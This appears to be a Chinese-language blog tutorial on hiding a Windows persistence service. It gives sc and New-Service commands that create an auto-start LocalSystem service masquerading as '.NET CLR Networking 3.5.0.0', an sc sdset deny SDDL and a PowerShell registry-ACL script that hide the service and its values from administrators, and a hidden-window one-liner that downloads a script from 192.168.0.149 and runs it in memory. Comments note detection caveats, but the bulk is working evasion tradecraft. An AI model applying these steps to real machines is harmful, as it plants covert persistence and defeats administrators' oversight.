竹林寺
第 1、2 步分别给出 cmd 与 PowerShell 两种写法，选其一执行即可；下面所有命令（创建服务、sc sdset、修改注册表 ACL）都需要在管理员权限下运行。
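REM 1. cmd: create an auto-start service that runs as LocalSystem.
REM    Needs an elevated prompt (SC_MANAGER_CREATE_SERVICE). If you run this from PowerShell,
REM    call sc.exe explicitly: in Windows PowerShell `sc` is an alias of Set-Content.
REM    cmd.exe is not a real service executable (it never calls StartServiceCtrlDispatcher),
REM    so on start the SCM will typically report a timeout (error 1053, System log 7000/7009)
REM    even though the command line itself is executed. Service creation is also logged
REM    (System log 7045; Security log 4697 when that audit subcategory is enabled) before
REM    any of the hiding steps below are applied.
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\test.txt" depend= Tcpip obj= Localsystem start= auto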
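# 2. PowerShell: create an auto-start (delayed) service. Counterpart of step 1; the original
#    omitted the Tcpip dependency, -DependsOn Tcpip makes the two variants match.
#    -StartupType AutomaticDelayedStart is accepted by PowerShell 6+/7; Windows PowerShell 5.1
#    types the parameter as ServiceStartMode (Automatic/Manual/Disabled) and may reject it —
#    there use -StartupType Automatic and then
#    `sc.exe config ".NET CLR Networking 3.5.0.0" start= delayed-auto`.
#    Parameter prefixes are plain ASCII hyphens (the pasted original carried en-dashes and a
#    broken "– StartupType" with a space, which does not parse). Requires elevation.
New-Service -Name ".NET CLR Networking 3.5.0.0" -DisplayName ".NET CLR Networking 3.5.0.0" -BinaryPathName "cmd.exe /k C:\test.txt" -DependsOn Tcpip -StartupType AutomaticDelayedStart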
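REM 3. Hide the service by rewriting its security descriptor (SDDL). The SDDL string must not
REM    contain whitespace between ACEs (the pasted original had spaces). Service rights used:
REM    DC=change config, LC=query status, WP=stop, DT=pause/continue, SD=delete. The deny ACEs
REM    for IU (interactive users), SU (service accounts) and BA (Administrators) are listed
REM    first, so SCM enumeration that needs SERVICE_QUERY_STATUS no longer returns the service
REM    to those callers.
REM    Caveats: SY (SYSTEM) is not denied anything, so anything running as SYSTEM (e.g. psexec -s)
REM    still sees it; BA keeps RC and WD, so an admin can `sc sdshow` the descriptor and `sc sdset`
REM    it back; the SACL still carries a failure-audit ACE (AU;FA) for Everyone, so denied opens
REM    can be audited when the matching object-access audit subcategory is enabled.
REM    Run elevated; from PowerShell use sc.exe.
sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"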
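# 4. Verify that neither SCM enumeration path lists the service any more.
#    - `sc query` with no arguments lists only *running* services, so a freshly created service
#      that has not been started would be missing even before the SDDL change; `state= all` is
#      required for this check to mean anything.
#    - findstr splits a quoted pattern at spaces into separate OR'ed search strings and treats
#      `.` as a regex wildcard, so the original matched any line containing "Networking" etc.;
#      /C: searches for the literal phrase.
#    - `sc` is an alias of Set-Content in Windows PowerShell; sc.exe works in both cmd and PowerShell.
#    - SY is not denied in the SDDL, so the same checks run as SYSTEM will still show the service.
sc.exe query state= all | findstr /C:".NET CLR Networking 3.5.0.0"
Get-Service | Where-Object { $_.Name -eq ".NET CLR Networking 3.5.0.0" }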
# 5. 但这样做有一个问题：服务键 HKLM\SYSTEM\CurrentControlSet\Services\<服务名> 的 DACL 并没有改变，任何用户用 reg query 或 regedit 都能直接看到其中异常的 ImagePath 等 value。
# 6. 修改注册表 ACL
我们可以通过修改该服务键的 DACL、对 Everyone 拒绝 QueryValues 权限，来阻止对其 value 的读取，达到隐藏异常值的效果。需要注意：这只隐藏 value，键名本身在枚举 Services 下的子键时仍然可见；Everyone 也包含 SYSTEM 和管理员，Deny 对它们同样生效；而且这样一个异常的 DACL 本身就可能被 ACL 审计或注册表监控发现。
**这里给出一个通过 PowerShell 修改注册表项访问权限的简单脚本（需要以管理员权限运行）：**
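function Server-Sddl-Change{
    <#
    .SYNOPSIS
    Rewrites the DACL of HKLM:\SYSTEM\CurrentControlSet\Services\<Name> so that value
    queries are denied to Everyone while most other key rights stay allowed.

    .DESCRIPTION
    The key's DACL is made non-inheriting (inherited ACEs are dropped; explicit ACEs
    already on the key are kept), then two explicit ACEs for Everyone (S-1-1-0) are added:
      * Deny  QueryValues  - reg query / Get-ItemProperty on the key fail
      * Allow SetValue, CreateSubKey, EnumerateSubKeys, Notify, CreateLink, Delete,
              ReadPermissions, WriteKey, ExecuteKey, ReadKey, ChangePermissions, TakeOwnership
    Set-Acl writes the DACL in canonical order (deny ACEs before allow ACEs), so the
    QueryValues bit contained in ReadKey/ExecuteKey is still refused.

    Review notes:
      * "Everyone" includes SYSTEM and Administrators, so the deny applies to them too.
        ReadPermissions/ChangePermissions remain allowed, so an admin can Get-Acl the key,
        see the anomalous ACL and simply reset it.
      * Only the values are hidden; the key name is still returned when enumerating
        ...\Services (that needs EnumerateSubKeys on the parent, which is untouched).
      * Everyone:Allow SetValue/ChangePermissions/TakeOwnership lets any local user rewrite
        the service configuration or undo the ACL - a weak spot and an easy detection.
      * NOTE(review): the SCM reads this key as SYSTEM, whose token also carries Everyone;
        whether the service still starts after a reboot under this deny is not shown here -
        confirm before relying on it.
    Must run elevated (Get-Acl/Set-Acl on HKLM).

    .PARAMETER Name
    Service name, i.e. the subkey under ...\Services. Although declared optional, an
    empty value is rejected so the ACL of the whole Services key is never rewritten.
    #>
    [CmdletBinding()]
    param
    (
        [parameter(Mandatory=$false)][String]$Name
    )

    # An omitted/empty Name would resolve $S to the Services root and re-ACL every
    # service on the host; refuse it explicitly (validation attributes do not run for
    # unbound optional parameters).
    if ([string]::IsNullOrWhiteSpace($Name)) {
        throw "Server-Sddl-Change: -Name must be a non-empty service name."
    }

    $ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
    $S = Join-Path $ROOT $Name
    if (-not (Test-Path -LiteralPath $S)) {
        throw "Server-Sddl-Change: service key '$S' does not exist."
    }

    $acl = Get-Acl -LiteralPath $S
    # $true  = protect the DACL (stop inheriting from the parent key)
    # $false = do not copy the inherited ACEs, i.e. drop them
    $acl.SetAccessRuleProtection($true, $false)

    # Well-known SID for Everyone; avoids the NTAccount name lookup, which is locale-dependent.
    $person      = New-Object System.Security.Principal.SecurityIdentifier("S-1-1-0")
    $inheritance = [System.Security.AccessControl.InheritanceFlags]::None
    $propagation = [System.Security.AccessControl.PropagationFlags]::None

    # Deny ACE: no value queries on this key.
    $denyRule = New-Object System.Security.AccessControl.RegistryAccessRule(
        $person,
        [System.Security.AccessControl.RegistryRights]::QueryValues,
        $inheritance,
        $propagation,
        [System.Security.AccessControl.AccessControlType]::Deny)
    $acl.AddAccessRule($denyRule)

    # Allow ACE: everything else (same right set as the original script).
    $allowRights = [System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSubKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,ChangePermissions,TakeOwnership"
    $allowRule = New-Object System.Security.AccessControl.RegistryAccessRule(
        $person,
        $allowRights,
        $inheritance,
        $propagation,
        [System.Security.AccessControl.AccessControlType]::Allow)
    $acl.AddAccessRule($allowRule)

    Set-Acl -LiteralPath $S -AclObject $acl
}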
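# 7. Fetch the script over HTTP and run it in memory, then call the function.
#    Lab-only shape: the script is pulled over plain HTTP with no integrity check, so any
#    on-path host can substitute its own code for 1.ps1 — use HTTPS or verify a hash first.
#    -exec bypass / -nop / -w hidden only affect the execution policy, profile loading and the
#    console window; they do not disable AMSI or script block logging (Event ID 4104), which
#    records the downloaded script body. Must run elevated for the Set-Acl inside the script.
#    The pasted original was split across lines ("- Name") and lost its closing double quote.
powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.0.149/1.ps1'));Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"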